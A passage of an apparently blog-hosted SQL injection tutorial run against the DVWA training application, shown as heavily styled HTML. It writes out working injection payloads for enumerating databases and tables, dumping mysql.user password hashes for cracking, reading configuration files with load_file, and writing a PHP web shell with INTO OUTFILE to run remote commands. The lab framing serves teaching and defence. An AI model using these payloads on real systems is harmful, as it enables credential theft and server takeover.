0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">The database() function will help us find the database name. We can use the LIKE clause to help determine the name. The ‘%’ is the wildcard character. Means 0 or more characters of any value, so %A% checks to see if the database name contains the letter A. ‘</span><span style="color: red;"><span style="font-family: Consolas, serif;">_</span></span><span style="font-family: Consolas, serif;">‘ represents any single character, so you can determine the length of the table name by incrementing the amount of </span><span style="color: red;"><span style="font-family: Consolas, serif;">_</span></span><span style="font-family: Consolas, serif;">’s until you get a response. Try the following:</span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘__’;#</strong></em></span></span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘____’;#</strong></em></span></span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘%W%’;#</strong></em></span></span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘D%’;#</strong></em></span></span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘D%’;#</strong></em></span></span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘%Z%’;#</strong></em></span></span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘_v_A’;#</strong></em></span></span></li>
</ul></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Find the table names - LIKE"></a><span style="font-family: Consolas, serif;"><strong>Find the table names – LIKE:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id =</span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;"><em><strong>a’ UNION SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema LIKE ‘%dv%</strong></em></span></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">SQL-92 Standardization (ISO 9075) includes the </span><span style="font-family: Consolas, serif;"><em>information_schema</em></span><span style="font-family: Consolas, serif;">database. This holds information on other databases, tables, users, etc…. Information_schema.</span><span style="font-family: Consolas, serif;"><em>tables,</em></span><span style="font-family: Consolas, serif;"> is a list of database names (table_schema) and table names (table_name). Fortunately for us, we can request both of these at once because the original query also requested two columns. By manipulating the </span><span style="color: red;"><span style="font-family: Consolas, serif;">WHERE table_name LIKE</span></span><span style="font-family: Consolas, serif;"> phrase, we can find the names of various tables. This is not necessary for this exercise because…</span></li>
</ul></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id =</span></span><span style="font-family: Consolas, serif;"><span style="font-size: x-small;"><em><strong>‘</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;"><em><strong>a’ UNION SELECT table_schema, table_name FROM information_schema.tables;#</strong></em></span></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">The loop will display all of the returned rows – not just the first one. By omitting the WHERE/LIKE portion, we are able to see all of the results.</span></span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Find the current SQL Version"></a><span style="font-family: Consolas, serif;"><strong>Find the current SQL Version</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ UNION ALL SELECT 1, @@version;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"> </span></span>ID: a’ UNION ALL SELECT 1, @@version;#<br />
First name: 1<br />
Surname: 5.1.41</li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">Here we can see that the current version number is</span></span><span style="color: black;"><span style="font-family: Consolas, serif;"> 5.</span></span><span style="color: black;">1.41.</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Find the current database user"></a><span style="font-family: Consolas, serif;"><strong>Find the current database user:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ UNION ALL SELECT system_user(),user();#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Result: ID: a’ UNION ALL SELECT 1, user();#<br />
First name: root@localhost<br />
Surname: root@localhost</li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="List Password Hashes"></a><span style="font-family: Consolas, serif;"><strong>List Password Hashes:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id =</span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><strong>‘</strong></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><strong>1′ UNION ALL SELECT user, password FROM mysql.user; — priv;#’</strong></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">“</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">This will hopefully display a password hash that can then be cracked with John the Ripper or other password crackers. This could be usefully for many things. If this works, check to see if they have a database management program such as PHPmyAdmin – log in with what you found (and cracked).</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Reading arbitrary files"></a><span style="font-family: Consolas, serif;"><strong>Reading arbitrary files:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;"><em><strong>‘ UNION ALL SELECT load_file(‘C:\\xampp\\htdocs\\dvwa\\.htaccess’), ’1</strong></em></span></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-size: x-small;"><span style="font-family: Consolas, serif;">This should show us the .htaccess file. We could of course, read any file that the SQL server has read rights to. You could check for .htpasswd, or some other file that contains sensitive information. PHP files that access a SQL database will often have the database password (likely in plain text) listed in the file. SQL injection will allow us to view the .php file without the php first being interpreted by the server.</span></span></li>
</ul></li>
</ul><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span> <span style="color: red;"><span style="font-family: Consolas, serif;">‘ UNION ALL SELECT load_file(‘C:\\xampp\\htdocs\\dvwa\\config\\config.inc.php’), ’1</span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">This works without error, but there is nothing printed to the screen. If you view the page source however, you should find something interesting.</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Writing arbitrary files"></a><span style="font-family: Consolas, serif;"><strong>Writing arbitrary files:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><strong>‘</strong></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>‘UNION SELECT ‘test’, ’123′ INTO OUTFILE ‘testing1.txt</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><strong>‘”</strong></span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">The command will likely return a few warnings – look closely, these could contain file paths that give us an idea of the web root location on the server…If all goes well, you should see a file named testing1.txt in the SQL data path. (If you are using Xampp on Windows, it should be <span style="color: black;">some</span></span><span style="color: black;"><span style="font-family: Consolas, serif;">thing</span></span><span style="font-family: Consolas, serif;"> like C:\xampp\mysql\data\dvwa\testing1.txt). Let’s try to write a file accessible to the web.</span></li>
</ul></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>‘UNION SELECT ‘test’, ’123′ INTO OUTFILE ‘c:\\xampp\\htdocs\\testing2.txt</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">“</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Now, point your web browser to “http://[web root]/testing2.txt”. What do you see…..it’s our OUTFILE! This means that the attacker has the ability to change existing web pages via SQL injection. This means, you can add your own pages to the site. It may also mean that we can execute remote code…</li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Remote Code execution"></a><span style="font-family: Consolas, serif;"><strong>Remote Code execution:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>‘ UNION SELECT ”, ‘’ INTO OUTFILE ‘C:\\xampp\\htdocs\\dvwa\\shell.php’;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Now point your browser to </span><span style="color: red;"><span style="font-family: Consolas, serif;">http://[web root]/dvwa/shell.php?cmd=dir</span></span><span style="font-family: Consolas, serif;">. Game over! We have just run a command on the remote server. From here we could download and run files (backdoor, keylogger, etc…), change system settings, add system users, etc…</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Note that if you try and change the directory, it will not remember the next time you run the command. Each time it is a new process. To find out what directory your are in, use the remote shell to execute the command ‘echo %25CD%25 ‘</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Getting around escaped characters:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-size: x-small;"><span style="font-family: Consolas, serif;">So far we have been using DVWA on the low security setting. Click on the “DVWA Security” tab on the left side of the DVWA webpage. Change the settings to medium and click Submit. Go back to “SQL Injeciton” and try an injection phrase that checks for the handling of quotes.</span></span></li>
</ul><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span> <span style="color: red;"><span style="font-family: Consolas, serif;">O’Malley’</span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">“</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; 